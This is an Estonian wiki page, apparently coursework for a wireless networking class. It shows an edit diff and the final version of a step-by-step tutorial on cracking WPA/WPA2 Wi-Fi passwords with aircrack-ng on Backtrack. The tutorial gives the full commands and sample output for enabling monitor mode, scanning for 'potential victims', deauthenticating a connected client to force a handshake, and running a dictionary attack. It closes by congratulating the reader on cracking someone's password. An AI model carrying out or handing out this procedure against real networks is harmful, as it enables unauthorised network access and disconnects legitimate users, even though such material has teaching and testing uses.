WPA kräkkimine: Difference between revisions

From ICO wiki
Jump to navigationJump to search
Gratsep (talk | contribs)
No edit summary
Gratsep (talk | contribs)
 
(13 intermediate revisions by the same user not shown)
Line 11: Line 11:
== Kuidas kräkkida WPA'd lahti?<br>  ==
== Kuidas kräkkida WPA'd lahti?<br>  ==


=== Punkt 1:<br> ===
Eeldus: Backtrack 5R3 <br> Airmong-ng'ga kokku sobiv WIFI kaart <br>  


Käivita wifi liides/kaart "kuulaja režiimis".<br>
=== Punkt 1. Hetkeseisu tuvastamine.  ===


Ava terminal ja kirjuta sinna käsk:<br>  
<br> Käivita '''airmong-ng''', et vaadata millised on sobivad airmong-ng'ga ühilduvad wifi-kaardid. See tagastab hetkeseisu.<br>  


*'''airmon-ng'''<br>
*'''airmon-ng'''<br>


On a machine with a Ralink, an Atheros and a Broadcom wireless card installed, the system responds: <br>
''Interface Chipset Driver''


Masinas millel on Ralink, Atheos ja Broadcom wifi kaart vastab terminal nii:<br>
''wlan0 Intel 1000REV=0x6C iwlwifi - [phy0]''


''Interface Chipset Driver<br> rausb0&nbsp;&nbsp;&nbsp;&nbsp; Ralink&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; RT73&nbsp;&nbsp;&nbsp; rt73<br> wlan0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Broadcom b43 - [phy0]<br> wifi0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Atheros&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; madwifi-ng<br> ath0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Atheros&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; madwifi-ng VAP (parent: wifi0)''<br>  
=== <br> Punkt 2. Monitooringu interface'i loomine.<br> ===


Peata ath0 kirjutades käsureale:<br>  
*'''airmon-ng start wlan0 '''--&gt;väljund:'''<br>'''


*'''airmon-ng stop ath0'''
''Interface Chipset Driver''  


<br>  
''wlan0 Intel 1000REV=0x6C iwlwifi - [phy0]<br> (monitor mode enabled on mon0)''


''Interface&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Chipset&nbsp;&nbsp;&nbsp;&nbsp; Driver<br> wifi0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Atheros &nbsp; &nbsp; madwifi-ng<br> ath0 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)''<br>  
=== Punkt 3. Potensiaalsete ohvrite otsimine:<br> ===


Kirjuta käsureale:<br>
Otsi BSSID'd ja kanaleid


*'''iwconfig'''<br>
*'''airodump-ng mon0''' --&gt; väljund:


Vastus peaks tulema umbes taoline:<br>  
''CH 1 ][ BAT: 1 hour 30 mins ][ Elapsed: 4 s ][ 2012-11-13 15:18 <br> BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID <br> 00:24:17:6A:99:95 -31 14 1 0 '''11''' 54 WPA2 CCMP PSK SeeEiOleWIFI <br> '''20:C9:D0:19:B1:61''' -70 10 0 0 2 54e. WPA2 CCMP PSK MacBook Pro's Wi-Fi Network <br> 64:70:02:68:BC:72 -74 13 0 0 1 54e. WPA2 CCMP PSK Data <br> BSSID STATION PWR Rate Lost Frames Probe ''<br>  


''lo no wireless extensions<br> eth0 no wireless extensions.<br> wifi0 no wireless extensions.''<br>
Ehk siis BSSID on 20:C9:D0:19:B1:61 ja asub see kanalil 11.


Kui peaks jutuma, et mõni athx veel töötab siis peata need käsitsi. Siis kontrolli uuesti tulemus '''iwconfig '''käsuga.<br>  
=== Punkt 4. Ootame ja loodame, et tekib 4way-handshake.<br> ===


Nüüd lisa oma WIFI kaart 9. kanalisse käsuga:<br>
*'''airodump-ng -c 11 --bssid 00:24:17:6A:99:95 wlan0'''


*'''airmon-ng start wifi0 9'''
Kui ei teki handshake mõistliku aja jooksul, siis on võimalik klient AP küljest lahti ühendada, et tekiks uus handshake.<br>


Märkus: selles käsus kasutame "wifi0" "ath0" asemel kuna madwifi-ng draiverid on kasutusel.<br>  
*'''aireplay-ng -0 1 -a 00:24:17:6A:99:95 -c 94:44:44:0E:5A:E1 mon0''' --&gt; väljund:<br>


Süsteem peaks vastama:  
''15:37:25 Waiting for beacon frame (BSSID: 00:24:17:6A:99:95) on channel 11<br> 15:37:26 Sending 64 directed DeAuth. STMAC: [94:44:44:0E:5A:E1] [25|62 ACKs]''<br>


''Interface Chipset Driver<br> wifi0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Atheros&nbsp;&nbsp;&nbsp; madwifi-ng<br> ath0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Atheros&nbsp;&nbsp;&nbsp;&nbsp; madwifi-ng VAP (parent: wifi0) (monitor mode enabled)''
Parameetrite manuaalid on vaadatavad siin: http://linux.die.net/man/1/aireplay-ng  


<br>  
=== Punkt 5. Kräkkimise osa!<br> ===


Näed, et "ath0" on määratud kuulamise reziimi. <br>  
==== 5.1 Katse lühikese sõnastikuga:<br> ====


Kontrolli, et kõik on õieti sisestades käsureale taas kord käsk '''iwconfig'''.
*'''aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b 00:24:17:6A:99:95 psk-0*cap '''--&gt; väljund:'''<br>'''


Süsteem peaks vastama:<br>  
''Opening psk-01.cap<br>Opening psk-02.cap<br>Reading packets, please wait...''


''lo no wireless extensions.<br> wifi0 no wireless extensions.<br> eth0 no wireless extensions.<br> ath0 IEEE 802.11g ESSID:"" Nickname:""<br> Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 <br> Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 <br> Retry:off RTS thr:off Fragment thr:off<br> Encryption key:off<br> Power Management:off<br> Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm<br> Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br> Tx excessive retries:0 Invalid misc:0 Missed beacon:0''<br>
''Aircrack-ng 1.1 r2178<br> [00:00:00] 233 keys tested (1532.68 k/s)<br> Current passphrase: valhalla<br> Master Key&nbsp;: B4 D8 F9 A1 70 C9 E2 3D 9C 82 7D 39 25 48 14 96 <br> D6 DC 22 13 34 D1 05 1A EC 67 BD 5F 27 01 9C 7D''


Näed, et ath0 monitoorib/on kuulamise reziimis. 9's kanal asub 2.452GHz sagedusel. Pääsupunkt näitab MAC aadressi. &nbsp;Soovituslik on üle kontrollida väljastatud informatsioon. Madwifi draiverid ja MAC&nbsp; peavad olema ära märgitud pääsupunkti (Access Point) reale (teisi draivereid ei kuvata).<br>  
''Transient Key&nbsp;: 83 CD 49 50 8F 52 1A 92 91 79 39 8C CD FC E8 6A <br> 57 73 4A 7E CE 15 F3 BD 74 AF 2C B8 23 D1 6C 45 <br> 90 78 BA 33 94 B1 52 7B ED 69 88 74 41 0B E9 62 <br> A4 22 A2 53 97 5C 5B 32 B8 21 50 C4 21 34 01 D9''


Et teada saada mis sagedusele vastab mingisugune kanal külasta seda lehte: [http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel.html#wp134132 . http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel.html#wp134132 ].<br>
''EAPOL HMAC&nbsp;: 40 7B 06 6B C6 87 27 FB F2 FF 2B 9C A7 85 54 19''


=== Punkt 2:<br> ===
''Passphrase not in dictionary <br>''


Selle punkti mõte on siis jooksutada airodump-ng'd, et teada saada soovitud Access Pointi.<br>  
'''''Järeldus: Paroolide fail liiga lühike ja ei sisalda vajalikku parooli!'''<br>  


Kirjuta käsureale:<br>  
==== 5.2 Juhul kui punkt 5.1 toimis ja väljund oli olemas:<br> ====


*'''airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0'''
Parool oli hoidlas olemas:<br> root@bt:~# aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b 00:24:17:6A:99:95 psk-0*cap <br>''Opening psk-01.cap<br>Opening psk-02.cap<br>Reading packets, please wait...''


Important: Do NOT use the ”--ivs” option. You must capture the full packets. <br>  
''Aircrack-ng 1.1 r2178<br> [00:00:00] 233 keys tested (1474.16 k/s)<br> KEY FOUND! ['''hackit123''' ]<br> Master Key&nbsp;: 52 06 5C A9 B9 79 95 44 62 0B E7 66 2D 62 64 7B <br> 35 D3 A5 06 61 D7 23 71 5C 23 20 C6 64 E8 A6 C9''


Tähtis on see, et EI TOHI kasutada --ivs'i käsus, kuna on oluline kõiki pakette püüda.<br>  
''Transient Key&nbsp;: 49 B3 7A 6A B0 96 64 19 D2 97 46 03 50 72 68 4F <br> EF F2 D6 21 C0 AB A8 1B 49 43 9E 21 96 E3 76 9C <br> 87 25 79 1D 35 B1 75 E6 C6 44 0D 5B 9D 18 69 9F <br> 32 1D 67 EB DB 48 50 99 00 AB 22 F7 82 22 54 77''


Näiteks tuleb väljund selline (eeldusel, et wifi klient on ühendatud võrku):  
''EAPOL HMAC&nbsp;: 80 89 8F 6F 3A 28 14 48 1A 7B 13 B3 0E 3F 30 E4<br>''


''CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80<br> BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br> 00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy <br> BSSID STATION PWR Lost Packets Probes <br> 00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116 ''<br>
<br>  
 
Kuna kuvati “WPA handshake: 00:14:6C:7E:40:80” siis see tähendab, et airodump-ng püüdis edukalt kinni the f'''our-way handshake.'''<br>
 
Selline näeb väljund välja kui EI OLE keegi wifisse ühendatud:'''<br>'''
 
''CH 9 ][ Elapsed: 4 s ][ 2007-03-24 17:51 <br> BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br> 00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy <br> BSSID STATION PWR Lost Packets Probes ''<br>  


=== Punkt 3:<br> ===
Palju õnne! Oled suutnud lahti kräkkida kellegi WIFI parooli.<br> Troubleshootide juhendid leiad aadressil [http://www.aircrack-ng.org/doku.php?id=cracking_wpa | http://www.aircrack-ng.org/doku.php?id=cracking_wpa]<br>  


See punkt on valikuline ja väga suur abiline, kui sul pole kannatlikust oodata airdump-ng järgi.Eelmise punkti väljundist näed ära MAC aadressi. Kirjuta käsureale järgnev käsk:<br>
PS! Kui parooli sõnaraamatus ei olnud, siis tuleks hankida kuskilt suurem või genereerida johntheripper-ga, suurte sõnaraamatute tekitamine võtab kaua aega ning nende läbi proovimine omakorda väga kaua aega, kõik sõltub arvuti protsessori kiirusest.  
 
*'''aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0'''<br>
 
Kui läheb hästi siis võib väljund olla selline:<br>
 
''11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]''
 
=== Punkt 4:<br>  ===
 
Selle punkti mõte on siis lahti murda WPA/WPA2. Selleks on sul vaja sõnastikku (password.lst).Võid ka oma sõnastikku kasutada. Põhimõtteliselt aircrack-ng proovib läbi kõik sõnad ja vaatab kas mõni neist sobib.<br>
 
Ava uus käsurea aken ja lisa käsk:
 
*'''aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap'''<br>
 
Kui sa saad väljundiks ''"No valid WPA handshakes found."'' siis tee&nbsp; läbi punkt 3 või varu kannatust ja proovi mingi aja tagant uuesti.<br>
 
Kui aga kõik läks nii nagu pidi on väljundiks:<br>
 
Aircrack-ng 0.8<br> [00:00:00] 2 keys tested (37.20 k/s)<br> KEY FOUND! [ 12345678 ]<br> Master Key&nbsp;: CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E <br> B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD <br> Transcient Key&nbsp;: 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 <br> CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 <br> FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E <br> 2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71 <br> EAPOL HMAC&nbsp;: 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB <br>
 
Palju õnne! Olen suutnud lahti kräkkida kellegi WIFI parooli. Troubleshootide juhendid leiad aadressil [http://www.aircrack-ng.org/doku.php?id=cracking_wpa http://www.aircrack-ng.org/doku.php?id=cracking_wpa]<br>


Kasutatud materjalid:<br>  
Kasutatud materjalid:<br>  


[[Www.vallaste.ee|www.vallaste.ee]]  
[[Www.vallaste.ee|http://www.vallaste.ee]]<br> [[Www.aircrack-ng.org|http://www.aircrack-ng.org/doku.php?id=cracking_wpa ]]<br> [[Www.petenetlive.com|http://www.petenetlive.com/KB/Article/0000633.htm ]]<br>


[http://www.aircrack-ng.org/doku.php?id=cracking_wpa http://www.aircrack-ng.org/doku.php?id=cracking_wpa]<br>  
'''<br> Autor: Gertti-Vena Rätsep'''


<br>
<br>  
 
Autor: Gertti-Vena Rätsep


[[Category:Traadita side alused]]
[[Category:Traadita_side_alused]]

Latest revision as of 01:36, 14 November 2012

Mis on WPA ja WPA2?

WPA (Wi-Fi Protected Access)- Andmeturbe protokoll Wi-Fi alliansilt IEEE 802.11 standardile vastavatele raadiokohtvõrkudele (Wi-Fi võrkudele). Siin kasutatakse TKIP (Temporal Key Integrity Protocol) protokolli, et tagada tugevamat krüpteerimist kui varasema WEP protokolli puhul (WEP kasutas RC4 algoritmi, kuid WPA kasutab AES algoritmi). WPA on tuletatud IEEE 802.11i andmeturbe standardist ning kasutab autentimiseks EAP protokolli.

WPA2 (Wireless Protected Access 2) - Traadita kohtvõrgu standardile IEEE 802.11i vastav andmeturbeprotokoll aastast 2004. On turvalisem kui vahepeal kasutatud WPA protokoll, sest kasutab krüpteerimiseks TKIP asemel märksa turvalisemat AES-põhist CCMP algoritmi. Alates 2006.a. peavad kõik Wi-Fi logoga varustatud seadmed toetama WPA2 andmeturvet.

Mis on WIFI?

Wi-Fi, WiFi (Wireless Fidelity) - Raadiokohtvõrk, raadio-Ethernet Wi-Fi on WECA (Wireless Ethernet Compatibility Alliance) poolt propageeritav kaubamärk, mis vastab raadiokohtvõrgu (WLAN) standardile IEEE 802.11. Tegemist on Etherneti protokolli kasutava kohtvõrguga, kus kaablid on asendatud raadiolinkidega. WiFi on ühilduv PC-kaartidega ja WiFi logot kandvate tugijaamadega Vahel kutsutakse raadiokohtvõrke ka "traadita Internetiks", kuigi tegelikult on ikkagi tegemist traadita kohtvõrkudega, mis võivad muidugi olla ühendatud ka Internetiga.

Kuidas kräkkida WPA'd lahti?

Eeldus: Backtrack 5R3
Airmong-ng'ga kokku sobiv WIFI kaart

Punkt 1. Hetkeseisu tuvastamine.


Käivita airmong-ng, et vaadata millised on sobivad airmong-ng'ga ühilduvad wifi-kaardid. See tagastab hetkeseisu.

  • airmon-ng

Interface Chipset Driver

wlan0 Intel 1000REV=0x6C iwlwifi - [phy0]


Punkt 2. Monitooringu interface'i loomine.

  • airmon-ng start wlan0 -->väljund:

Interface Chipset Driver

wlan0 Intel 1000REV=0x6C iwlwifi - [phy0]
(monitor mode enabled on mon0)

Punkt 3. Potensiaalsete ohvrite otsimine:

Otsi BSSID'd ja kanaleid

  • airodump-ng mon0 --> väljund:

CH 1 ][ BAT: 1 hour 30 mins ][ Elapsed: 4 s ][ 2012-11-13 15:18
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:24:17:6A:99:95 -31 14 1 0 11 54 WPA2 CCMP PSK SeeEiOleWIFI
20:C9:D0:19:B1:61 -70 10 0 0 2 54e. WPA2 CCMP PSK MacBook Pro's Wi-Fi Network
64:70:02:68:BC:72 -74 13 0 0 1 54e. WPA2 CCMP PSK Data
BSSID STATION PWR Rate Lost Frames Probe

Ehk siis BSSID on 20:C9:D0:19:B1:61 ja asub see kanalil 11.

Punkt 4. Ootame ja loodame, et tekib 4way-handshake.

  • airodump-ng -c 11 --bssid 00:24:17:6A:99:95 wlan0

Kui ei teki handshake mõistliku aja jooksul, siis on võimalik klient AP küljest lahti ühendada, et tekiks uus handshake.

  • aireplay-ng -0 1 -a 00:24:17:6A:99:95 -c 94:44:44:0E:5A:E1 mon0 --> väljund:

15:37:25 Waiting for beacon frame (BSSID: 00:24:17:6A:99:95) on channel 11
15:37:26 Sending 64 directed DeAuth. STMAC: [94:44:44:0E:5A:E1] [25|62 ACKs]

Parameetrite manuaalid on vaadatavad siin: http://linux.die.net/man/1/aireplay-ng

Punkt 5. Kräkkimise osa!

5.1 Katse lühikese sõnastikuga:

  • aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b 00:24:17:6A:99:95 psk-0*cap --> väljund:

Opening psk-01.cap
Opening psk-02.cap
Reading packets, please wait...

Aircrack-ng 1.1 r2178
[00:00:00] 233 keys tested (1532.68 k/s)
Current passphrase: valhalla
Master Key : B4 D8 F9 A1 70 C9 E2 3D 9C 82 7D 39 25 48 14 96
D6 DC 22 13 34 D1 05 1A EC 67 BD 5F 27 01 9C 7D

Transient Key : 83 CD 49 50 8F 52 1A 92 91 79 39 8C CD FC E8 6A
57 73 4A 7E CE 15 F3 BD 74 AF 2C B8 23 D1 6C 45
90 78 BA 33 94 B1 52 7B ED 69 88 74 41 0B E9 62
A4 22 A2 53 97 5C 5B 32 B8 21 50 C4 21 34 01 D9

EAPOL HMAC : 40 7B 06 6B C6 87 27 FB F2 FF 2B 9C A7 85 54 19

Passphrase not in dictionary

Järeldus: Paroolide fail liiga lühike ja ei sisalda vajalikku parooli!

5.2 Juhul kui punkt 5.1 toimis ja väljund oli olemas:

Parool oli hoidlas olemas:
root@bt:~# aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b 00:24:17:6A:99:95 psk-0*cap
Opening psk-01.cap
Opening psk-02.cap
Reading packets, please wait...

Aircrack-ng 1.1 r2178
[00:00:00] 233 keys tested (1474.16 k/s)
KEY FOUND! [hackit123 ]
Master Key : 52 06 5C A9 B9 79 95 44 62 0B E7 66 2D 62 64 7B
35 D3 A5 06 61 D7 23 71 5C 23 20 C6 64 E8 A6 C9

Transient Key : 49 B3 7A 6A B0 96 64 19 D2 97 46 03 50 72 68 4F
EF F2 D6 21 C0 AB A8 1B 49 43 9E 21 96 E3 76 9C
87 25 79 1D 35 B1 75 E6 C6 44 0D 5B 9D 18 69 9F
32 1D 67 EB DB 48 50 99 00 AB 22 F7 82 22 54 77

EAPOL HMAC : 80 89 8F 6F 3A 28 14 48 1A 7B 13 B3 0E 3F 30 E4


Palju õnne! Oled suutnud lahti kräkkida kellegi WIFI parooli.
Troubleshootide juhendid leiad aadressil | http://www.aircrack-ng.org/doku.php?id=cracking_wpa

PS! Kui parooli sõnaraamatus ei olnud, siis tuleks hankida kuskilt suurem või genereerida johntheripper-ga, suurte sõnaraamatute tekitamine võtab kaua aega ning nende läbi proovimine omakorda väga kaua aega, kõik sõltub arvuti protsessori kiirusest.

Kasutatud materjalid:

http://www.vallaste.ee
http://www.aircrack-ng.org/doku.php?id=cracking_wpa
http://www.petenetlive.com/KB/Article/0000633.htm


Autor: Gertti-Vena Rätsep